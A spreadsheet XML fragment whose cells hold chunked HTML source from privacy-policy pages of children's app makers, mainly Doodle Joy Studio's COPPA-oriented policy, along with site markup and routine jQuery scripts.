            &lt;div class="subnav"&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/about-overview"&gt;
                  Overview
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="collection active"&gt;
                &lt;a href="/privacy-policy"&gt;
                  Privacy Policy
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/data-policy"&gt;
                  Data Policy
                &lt;/a&gt;
              &lt;/div&gt;
            &lt;/div&gt;
          &lt;/div&gt;
            &lt;div class="collection"&gt;
              &lt;a href="/contact-us"&gt;
                Contact us
              &lt;/a&gt;
            </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/div&gt;
    &lt;/nav&gt;
  &lt;/div&gt;
    &lt;/div&gt;
    &lt;div id="siteWrapper" class="clearfix"&gt;
      &lt;div class="sqs-cart-dropzone"&gt;&lt;/div&gt;
      &lt;header id="header" class="show-on-scroll" data-offset-el=".index-section" data-offset-behavior="bottom" role="banner"&gt;
        &lt;div class="header-inner"&gt;
          &lt;div id="logoWrapper" class="wrapper" data-content-field="site-title"&gt;
              &lt;h1 id="logoImage"&gt;&lt;a href="/"&gt;&lt;img src="//images.squarespace-cdn.com/content/v1/562614e0e4b04ac58dc994d1/1556608349131-8ASDK0FKUSNJE2DOUD06/Round_icon_logo_small.png?format=1500w" alt="App Family" /&gt;&lt;/a&gt;&lt;/h1&gt;
           &lt;/div&gt;&lt;!--
          --&gt;&lt;div class="mobile-nav-toggle"&gt;&lt;div class="top-bar"&gt;&lt;/div&gt;&lt;div class="middle-bar"&gt;&lt;/div&gt;&lt;div class="bottom-bar"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="mobile-nav-toggle fixed-nav-toggle"&gt;&lt;div class="top-bar"&gt;&lt;/div&gt;&lt;div class="middle-bar"&gt;&lt;/div&gt;&lt;div class="bottom-bar"&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--
          --&gt;&lt;div id="headerNav"&gt;
  &lt;div id="mainNavWrapper" class="nav-wrapper" data-content-field="navigation-mainNav"&gt;
    &lt;nav id="mainNavigation" data-content-field="navigation-mainNav"&gt;
            &lt;div class="collection homepage"&gt;
              &lt;a href="/"&gt;
                Home
              &lt;/a&gt;
             &lt;/div&gt;
            &lt;div class="collection"&gt;
              &lt;a href="/games"&gt;
                Games
              &lt;/a&gt;
            &lt;/div&gt;
          &lt;div class="folder"&gt;
            &lt;div class="folder-toggle" data-href="/educational-apps"&gt;Educational apps&lt;/div&gt;
            &lt;div class="subnav"&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/edu-overview"&gt;
                  Overview
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/mymemo"&gt;
                  MyMemo guide
                &lt;/a&gt;
              &lt;/div&gt;
            &lt;/div&gt;
          &lt;/div&gt;
          &lt;div class="folder active"&gt;
            &lt;div class="folder-toggle" data-href="/about-us"&gt;About Us&lt;/div&gt;
            &lt;div class="subnav"&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/about-overview"&gt;
                  Overview
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="collection active"&gt;
                &lt;a href="/privacy-policy"&gt;
                  Privacy Policy
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/data-policy"&gt;
                  Data Policy
                &lt;/a&gt;
              &lt;/div&gt;
            &lt;/div&gt;
          &lt;/div&gt;
            &lt;div class="collection"&gt;
              &lt;a href="/contact-us"&gt;
                Contact us
              &lt;/a&gt;
            </t>
  </si>
  <si>
    <t>&lt;/div&gt;
    &lt;/nav&gt;
  &lt;/div&gt;
  &lt;!-- style below blocks out the mobile nav toggle only when nav is loaded --&gt;
  &lt;style&gt;.mobile-nav-toggle-label { display: inline-block !important; }&lt;/style&gt;
&lt;/div&gt;
        &lt;/div&gt;
      &lt;/header&gt;
                &lt;div id="promotedGalleryWrapper" class="sqs-layout promoted-gallery-wrapper"&gt;&lt;div class="row"&gt;&lt;div class="col"&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
      &lt;main id="page" role="main"&gt;
        &lt;!--
        --&gt;&lt;!--
        --&gt;&lt;div id="folderNav" data-content-field="navigation-folderNav"&gt;
  &lt;div class="folder-nav-toggle"&gt;&lt;/div&gt;
  &lt;nav class="folder-nav" role="navigation"&gt;
    &lt;ul&gt;
    &lt;li class="nav-section-label"&gt;About Us&lt;/li&gt;
      &lt;li class="page-collection"&gt;&lt;a href="/about-overview"&gt;Overview&lt;/a&gt;&lt;/li&gt;
      &lt;li class="page-collection active-link"&gt;&lt;a href="/privacy-policy"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;
      &lt;li class="page-collection"&gt;&lt;a href="/data-policy"&gt;Data Policy&lt;/a&gt;&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/nav&gt;
&lt;/div&gt;&lt;!--
        --&gt;&lt;div id="content" class="main-content" data-content-field="main-content" data-collection-id="5631dde8e4b056714fc019d0" data-edit-main-image=""&gt;
         &lt;div class="sqs-layout sqs-grid-12 columns-12" data-type="page" data-updated-on="1660913931302" id="page-5631dde8e4b056714fc019d0"&gt;&lt;div class="row sqs-row"&gt;&lt;div class="col sqs-col-12 span-12"&gt;&lt;div class="sqs-block html-block sqs-block-html" data-block-type="2" id="block-5856ae57cbaf8f28ab39"&gt;&lt;div class="sqs-block-content"&gt;
&lt;h1 style="text-align:center;white-space:pre-wrap;"&gt;Privacy and terms of use&lt;/h1&gt;&lt;h3 style="white-space:pre-wrap;"&gt;&amp;nbsp;&lt;/h3&gt;&lt;h3</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US" class="no-js"&gt;
&lt;head&gt;
	&lt;meta charset="UTF-8"&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
	&lt;link rel="profile" href="http://gmpg.org/xfn/11"&gt;
		&lt;script&gt;(function(html){html.className = html.className.replace(/\bno-js\b/,'js')})(document.documentElement);&lt;/script&gt;
&lt;title&gt;PRIVACY POLICY &amp;#8211; Doodle Joy Studio&lt;/title&gt;
&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Doodle Joy Studio &amp;raquo; Feed" href="https://doodlejoy.studio/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Doodle Joy Studio &amp;raquo; Comments Feed" href="https://doodlejoy.studio/comments/feed/" /&gt;
&lt;script type="text/javascript"&gt;
 window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/doodlejoy.studio\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};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t>
  </si>
  <si>
    <t>o.length;r++)t.supports[o[r]]=function(e){if(p&amp;&amp;p.fillText)switch(p.textBaseline="top",p.font="600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[129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}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t>
  </si>
  <si>
    <t>important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='wp-block-library-css' href='https://doodlejoy.studio/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;style id='wp-block-library-theme-inline-css' type='text/css'&gt;
 .wp-block-audio figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-audio{margin:0 0 1em}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{color:hsla(0,0%,100%,.65)}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-top:4px solid;border-bottom:4px solid;margin-bottom:1.75em;color:currentColor}.wp-block-pullquote__citation,.wp-block-pullquote cite,.wp-block-pullquote footer{color:currentColor;text-transform:uppercase;font-size:.8125em;font-style:normal}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;position:relative;font-style:normal}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-align-center{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table{margin:"0 0 1em 0"}.wp-block-table</t>
  </si>
  <si>
    <t>thead{border-bottom:3px solid}.wp-block-table tfoot{border-top:3px solid}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{padding:1.25em 2.375em;margin-top:0;margin-bottom:0}
&lt;/style&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://doodlejoy.studio/wp-includes/css/classic-themes.min.css?ver=1' type='text/css' media='all' /&gt;
&lt;style id='global-styles-inline-css' type='text/css'&gt;
body{--wp--preset--color--black: #111111;--wp--preset--color--cyan-bluish-gray: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#9b51e0;--wp--preset--color--gray: #999999;--wp--preset--color--yellow: #f1c970;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: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14px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 42px;--wp--preset--font-size--x-large: 42px;--wp--preset--font-size--normal: 18px;--wp--preset--font-size--huge: 62px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;}:where(.is-layout-flex){gap: 0.5em;}body .is-layout-flow &gt; .alignleft{float:</t>
  </si>
  <si>
    <t>important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='kids-camp-fonts-css' href='https://fonts.googleapis.com/css?family=Noto+Serif%3A300%2C400%2C600%2C700%2C900%7CAmatic+SC%3A300%2C400%2C600%2C700%2C900&amp;#038;subset=latin%2Clatin-ext' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='kids-camp-style-css' href='https://doodlejoy.studio/wp-content/themes/kids-camp/style.css?ver=20200722-62633' type='text/css' media='all' /&gt;
&lt;style id='kids-camp-style-inline-css' type='text/css'&gt;
.custom-header:after {
				background-color: rgba(0,0,0,0);
		    } 
&lt;/style&gt;
&lt;link rel='stylesheet' id='kids-camp-block-style-css' href='https://doodlejoy.studio/wp-content/themes/kids-camp/assets/css/blocks.css?ver=1.0' type='text/css' media='all' /&gt;
&lt;!--[if lt IE 9]&gt;
&lt;script type='text/javascript' src='https://doodlejoy.studio/wp-content/themes/kids-camp/assets/js/html5.min.js?ver=3.7.3' id='kids-camp-html5-js'&gt;&lt;/script&gt;
&lt;! [endif]--&gt;
&lt;script type='text/javascript' src='https://doodlejoy.studio/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://doodlejoy.studio/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://doodlejoy.studio/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://doodlejoy.studio/wp-json/wp/v2/pages/34" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="EditURI" type="application/rsd+xml" title="RSD" href="https://doodlejoy.studio/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://doodlejoy.studio/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress 6.1.1" /&gt;
&lt;link rel="canonical" href="https://doodlejoy.studio/privacy-policy/" /&gt;
&lt;link rel='shortlink' href='https://doodlejoy.studio/?p=34' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://doodlejoy.studio/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fdoodlejoy.studio%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://doodlejoy.studio/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fdoodlejoy.studio%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;style type="text/css"&gt;.recentcomments a{display:inline !important;padding:0 ! important;margin:0 ! important;}&lt;/style&gt;			&lt;style type="text/css" id="kids-camp-header-css"&gt;
		.site-title a,
		.site-description {
			color: #3f3734;
		}
		&lt;/style&gt;
	&lt;link rel="icon" href="https://doodlejoy.studio/wp-content/uploads/2020/07/app_kidsdoodle-150x150.png" sizes="32x32" /&gt;
&lt;link rel="icon" href="https://doodlejoy.studio/wp-content/uploads/2020/07/app_kidsdoodle.png" sizes="192x192" /&gt;
&lt;link rel="apple-touch-icon" href="https://doodlejoy.studio/wp-content/uploads/2020/07/app_kidsdoodle.png" /&gt;
&lt;meta name="msapplication-TileImage" content="https://doodlejoy.studio/wp-content/uploads/2020/07/app_kidsdoodle.png" /&gt;
&lt;/head&gt;
&lt;body class="page-template-default page page-id-34 wp-embed-responsive fluid-layout two-columns-layout content-left header-right-menu-disabled footer-center primary-nav-center"&gt;
&lt;svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" &gt;&lt;defs&gt;&lt;filter id="wp-duotone-dark-grayscale"&gt;&lt;feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299</t>
  </si>
  <si>
    <t>type="table" tableValues="1 1" /&gt;&lt;/feComponentTransfer&gt;&lt;feComposite in2="SourceGraphic" operator="in" /&gt;&lt;/filter&gt;&lt;/defs&gt;&lt;/svg&gt;
&lt;div id="page" class="site"&gt;
	&lt;a class="skip-link screen-reader-text" href="#content"&gt;Skip to content&lt;/a&gt;
	&lt;header id="masthead" class="site-header" role="banner"&gt;
&lt;div id="header-content"&gt;
	&lt;div class="wrapper"&gt;
		&lt;div class="site-header-main"&gt;
			&lt;div class="site-branding"&gt;
				&lt;div class="site-identity"&gt;
											&lt;p class="site-title"&gt;&lt;a href="https://doodlejoy.studio/" rel="home"&gt;Doodle Joy Studio&lt;/a&gt;&lt;/p&gt;
											&lt;p class="site-description"&gt;Drawing Apps To Free Your Art Imagination&lt;/p&gt;
									&lt;/div&gt;&lt;!-- .site-identity --&gt;
			&lt;/div&gt;&lt;!-- .site-branding --&gt;
			&lt;div class="site-header-right-wrapper"&gt;
	&lt;div id="site-header-right-menu" class="site-secondary-menu"&gt;
		&lt;div class="secondary-search-wrapper"&gt;
			&lt;div id="search-container-main"&gt;
				&lt;button id="search-toggle-main" class="menu-search-main-toggle"&gt;
					&lt;svg class="icon icon-search" aria-hidden="true" role="img"&gt; &lt;use href="#icon-search" xlink:href="#icon-search"&gt;&lt;/use&gt; &lt;/svg&gt;&lt;svg class="icon icon-close" aria-hidden="true" role="img"&gt; &lt;use href="#icon-close" xlink:href="#icon-close"&gt;&lt;/use&gt; &lt;/svg&gt;&lt;span class="menu-label-prefix"&gt;Search &lt;/span&gt;				&lt;/button&gt;
	        	&lt;div class="search-container"&gt;
&lt;form role="search" method="get" class="search-form" action="https://doodlejoy.studio/"&gt;
	&lt;label&gt;
		&lt;span class="screen-reader-text"&gt;Search for:&lt;/span&gt;
		&lt;input type="search" class="search-field" placeholder="Search" value="" name="s" /&gt;
	&lt;/label&gt;
	&lt;button type="submit" class="search-submit"&gt;&lt;svg class="icon icon-search" aria-hidden="true" role="img"&gt; &lt;use href="#icon-search" xlink:href="#icon-search"&gt;&lt;/use&gt; &lt;/svg&gt;&lt;span class="screen-reader-text"&gt;Search&lt;/span&gt;&lt;/button&gt;
&lt;/form&gt;
	            &lt;/div&gt;&lt;!-- .search-container --&gt;
			&lt;/div&gt;&lt;!-- #search-social-container --&gt;
		&lt;/div&gt;&lt;!-- .secondary-search-wrapper --&gt;
	&lt;/div&gt;&lt;!-- #site-header-right-menu --&gt;
&lt;/div&gt;
		&lt;/div&gt;&lt;!-- .site-header-main --&gt;
	&lt;/div&gt;&lt;!-- .wrapper --&gt;
&lt;/div&gt;&lt;!-- #header-content --&gt;
		&lt;div id="header-navigation-area"&gt;
	&lt;div class="wrapper"&gt;
		&lt;button id="primary-menu-toggle" class="menu-primary-toggle menu-toggle" aria-controls="primary-menu" aria-expanded="false"&gt;
			&lt;svg class="icon icon-bars" aria-hidden="true" role="img"&gt; &lt;use href="#icon-bars" xlink:href="#icon-bars"&gt;&lt;/use&gt; &lt;/svg&gt;&lt;svg class="icon icon-close" aria-hidden="true" role="img"&gt; &lt;use href="#icon-close" xlink:href="#icon-close"&gt;&lt;/use&gt; &lt;/svg&gt;			&lt;span class="menu-label"&gt;Menu&lt;/span&gt;
		&lt;/button&gt;
		&lt;div id="site-header-menu" class="site-primary-menu"&gt;
							&lt;nav id="site-primary-navigation" class="main-navigation site-navigation default-page-menu" role="navigation" aria-label="Primary Menu"&gt;
					&lt;div class="primary-menu-container"&gt;&lt;ul id="primary-page-menu" class="primary-menu"&gt;&lt;li class="page_item page-item-2"&gt;&lt;a href="https://doodlejoy.studio/sample-page/"&gt;About Us&lt;/a&gt;&lt;/li&gt;&lt;li class="page_item page-item-34 current_page_item"&gt;&lt;a href="https://doodlejoy.studio/privacy-policy/" aria-current="page"&gt;PRIVACY POLICY&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;				&lt;/nav&gt;&lt;!--</t>
  </si>
  <si>
    <t>#site-primary-navigation.default-page-menu --&gt;
					&lt;/div&gt;&lt;!-- .site-primary-menu --&gt;
	&lt;/div&gt;&lt;!-- .wrapper --&gt;
&lt;/div&gt;&lt;!-- #header-navigation-area --&gt;
	&lt;/header&gt;&lt;!-- .site-header --&gt;
	&lt;div id="content" class="site-content"&gt;
		&lt;div class="wrapper"&gt;
	&lt;div id="primary" class="content-area"&gt;
		&lt;main id="main" class="site-main" role="main"&gt;
			&lt;div class="singular-content-wrap"&gt;
&lt;article id="post-34" class="post-34 page type-page status-publish hentry"&gt;
			&lt;header class="entry-header"&gt;
			&lt;h1 class="entry-title"&gt;PRIVACY POLICY&lt;/h1&gt;					&lt;/header&gt;&lt;!-- .entry-header --&gt;
	&lt;div class="entry-content"&gt;
&lt;h1&gt;PRIVACY POLICY&lt;/h1&gt;
&lt;p&gt; Your privacy is important to Doodle Joy Studios and we are committed to protecting the privacy of parents and kids. Please take a moment to familiarize yourself with our privacy practices.&amp;nbsp;&lt;/p&gt;
&lt;p&gt;Doodle Joy Studios uses and makes all attempts to protect all information when you use our apps &amp;amp; services.&lt;/p&gt;
&lt;p&gt;If you do not agree to this Privacy Policy, please do not use the service.</t>
  </si>
  <si>
    <t>We reserve the right to make changes to this Privacy Policy. If we make a material change to this Privacy Policy, we will notify you by posting the change in this Privacy Policy. Please check back from time to time to ensure that you are aware of these changes.</t>
  </si>
  <si>
    <t>Your continued use of the Service will signify your acceptance of these changes.&amp;nbsp;&lt;/p&gt;
&lt;p&gt; WE DO NOT KNOWINGLY COLLECT PERSONAL INFORMATION FROM CHILDREN UNDER 13.&lt;/p&gt;
&lt;p&gt; We take many special precautions to protect the privacy of children under 13.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;At our websites and through our apps intended for children, we do not collect personal contact information (like full name, birthdate, phone number or home address) from children.&lt;/li&gt;
&lt;li&gt;We take steps to prevent children from posting or publicly disclosing personal contact information.</t>
  </si>
  <si>
    <t>There is no means by which a child can post or disclose personal contact on our site or apps.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt; We use technology, like cookies, to recognize returning visitors, for research and other purposes, in accordance with the Children’s Online Privacy Protection Act (“COPPA&amp;#8221;).&lt;/p&gt;
&lt;p&gt; We require our advertising service partners to comply with self-regulatory guidelines on targeted advertising.</t>
  </si>
  <si>
    <t>We do not permit interest-based advertising on any sites or app.&lt;/p&gt;
&lt;p&gt;&lt;/p&gt;
&lt;h2&gt; A SPECIAL NOTE FOR PARENTS AND LEGAL GUARDIANS:&lt;/h2&gt;
&lt;p&gt;Doodle Joy Studio adheres to the U.S. Children’s Online Privacy Protection Act of 1998 (“COPPA”) and the guidelines of the Children’s Advertising Review Unit (“CARU”) of the Council of Better Business Bureaus, Inc. in our web Sites, online services and Apps directed to children under 13. Wherever we refer to “children” or a “child” in this Privacy Statement, we mean children under 13.&lt;/p&gt;
	&lt;/div&gt;&lt;!-- .entry-content --&gt;
&lt;/article&gt;&lt;!--</t>
  </si>
  <si>
    <t>#post-## --&gt;
			&lt;/div&gt;&lt;!-- .singular-content-wrap --&gt;
		&lt;/main&gt;&lt;!-- .site-main --&gt;
	&lt;/div&gt;&lt;!-- .content-area --&gt;
&lt;aside id="secondary" class="sidebar widget-area" role="complementary"&gt;
	&lt;section id="media_gallery-2" class="widget widget_media_gallery"&gt;&lt;div id='gallery-1' class='gallery galleryid-34 gallery-columns-3 gallery-size-thumbnail'&gt;&lt;figure class='gallery-item'&gt;
			&lt;div class='gallery-icon landscape'&gt;
				&lt;a href='https://doodlejoy.studio/app_kidsdoodle/'&gt;&lt;img width="150" height="150" src="https://doodlejoy.studio/wp-content/uploads/2020/07/app_kidsdoodle-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" decoding="async" loading="lazy" srcset="https://doodlejoy.studio/wp-content/uploads/2020/07/app_kidsdoodle-150x150.png 150w, https://doodlejoy.studio/wp-content/uploads/2020/07/app_kidsdoodle.png 256w" sizes="(max-width: 150px) 100vw, 150px" /&gt;&lt;/a&gt;
			&lt;/div&gt;&lt;/figure&gt;&lt;figure class='gallery-item'&gt;
			&lt;div class='gallery-icon landscape'&gt;
				&lt;a href='https://doodlejoy.studio/app_kaleido/'&gt;&lt;img width="150" height="150" src="https://doodlejoy.studio/wp-content/uploads/2020/07/app_kaleido-150x150.png" class="attachment-thumbnail size-thumbnail" alt="" decoding="async" loading="lazy" srcset="https://doodlejoy.studio/wp-content/uploads/2020/07/app_kaleido-150x150.png 150w, https://doodlejoy.studio/wp-content/uploads/2020/07/app_kaleido-240x240.png 240w, https://doodlejoy.studio/wp-content/uploads/2020/07/app_kaleido-110x110.png 110w, https://doodlejoy.studio/wp-content/uploads/2020/07/app_kaleido.png 256w" sizes="(max-width: 150px) 100vw, 150px" /&gt;&lt;/a&gt;
			&lt;/div&gt;&lt;/figure&gt;&lt;figure class='gallery-item'&gt;
			&lt;div class='gallery-icon landscape'&gt;
				&lt;a href='https://doodlejoy.studio/a</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&gt;
&lt;title&gt;Privacy Policy | Intellijoy&lt;/title&gt;
&lt;link rel="profile" href="http://gmpg.org/xfn/11" /&gt;
&lt;link rel="stylesheet" type="text/css" media="all" href="http://www.intellijoy.com/wp-content/themes/10831/style.css" /&gt;
&lt;link rel="pingback" href="http://www.intellijoy.com/xmlrpc.php" /&gt;
 &lt;link rel="stylesheet" type="text/css" href="http://www.intellijoy.com/wp-content/themes/10831/css/jquery.ad-gallery.css"&gt;
&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Intellijoy &amp;raquo; Feed" href="http://www.intellijoy.com/feed" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Intellijoy &amp;raquo; Comments Feed" href="http://www.intellijoy.com/comments/feed" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Intellijoy &amp;raquo; Privacy Policy Comments Feed" href="http://www.intellijoy.com/privacy-policy/feed" /&gt;
&lt;script type="text/javascript"&gt;
 window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.intellijoy.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};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t>
  </si>
  <si>
    <t>important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='wp-block-library-css' href='http://www.intellijoy.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='http://www.intellijoy.com/wp-includes/css/classic-themes.min.css?ver=1'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 2em;}body .is-layout-flow &gt; .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow &gt; .aligncenter{margin-left: auto !important;margin-right: auto !</t>
  </si>
  <si>
    <t>important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) ! important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='contact-form-7-css' href='http://www.intellijoy.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.2' type='text/css' media='all' /&gt;
&lt;script type='text/javascript' src='http://www.intellijoy.com/wp-content/plugins/jquery-updater/js/jquery-3.6.3.min.js?ver=3.6.3' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='http://www.intellijoy.com/wp-content/plugins/jquery-updater/js/jquery-migrate-3.4.0.min.js?ver=3.4.0' id='jquery-migrate-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="http://www.intellijoy.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="http://www.intellijoy.com/wp-json/wp/v2/pages/445" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.intellijoy.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.intellijoy.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress 6.1.1" /&gt;
&lt;link rel="canonical" href="http://www.intellijoy.com/privacy-policy" /&gt;
&lt;link rel='shortlink' href='http://www.intellijoy.com/?p=445' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="http://www.intellijoy.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.intellijoy.com%2Fprivacy-policy" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="http://www.intellijoy.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.intellijoy.com%2Fprivacy-policy&amp;#038;format=xml" /&gt;
	&lt;!-- SET: SCRIPTS --&gt;
&lt;script&gt;
function smartColumns() { //Create a function that calculates the smart columns
        //Reset column size to a 100% once view port has been adjusted
	$(".info_for ul").css({ 'width' : "100%"});
var cols=$(".info_for ul li").length;
//alert(cols);
	var colWrap</t>
  </si>
  <si>
    <t>END: SCRIPTS --&gt;
&lt;!-- SCRIPTS for contntact_form slider --&gt;
&lt;script type="text/javascript"&gt;
$(document).ready(function(){
	/*$('.ad-thumb-list li a').on('click', function(){
		$(this).css('border', '1px solid red');
	});*/
	$('#navs ul li').on('click',function(){
		var index = $(this).index();
		$('#current-link').val(eval(index+1));
		if($('#current-link').val() == 8){
			$('.ad-forward').hide();
		}else{
			$('.ad-forward').show();
		}
		if($('#current-link').val() == 1){
			$('.ad-back').hide();
		}else{
			$('.ad-back').show();
		}
	})
	$('.nav &gt; ul &gt; li</t>
  </si>
  <si>
    <t>:first').addClass('pad_last');
	$('.nav ul.sub-menu').each(function(){
		$(this).prepend('&lt;li class="first_ first_bg"&gt;&lt;/li&gt;');
	});
	$('.nav &gt; ul &gt; li</t>
  </si>
  <si>
    <t xml:space="preserve">: last').find('a').addClass('contact btn-slide');
	</t>
  </si>
  <si>
    <t>$('#footer .menu').each(function(){
		$(this).find('li:last').find('span').hide();
	});
	$('.wpcf7-form input:text').each(function(){
		$(this).focus(function(){
			clearText(this);
		});
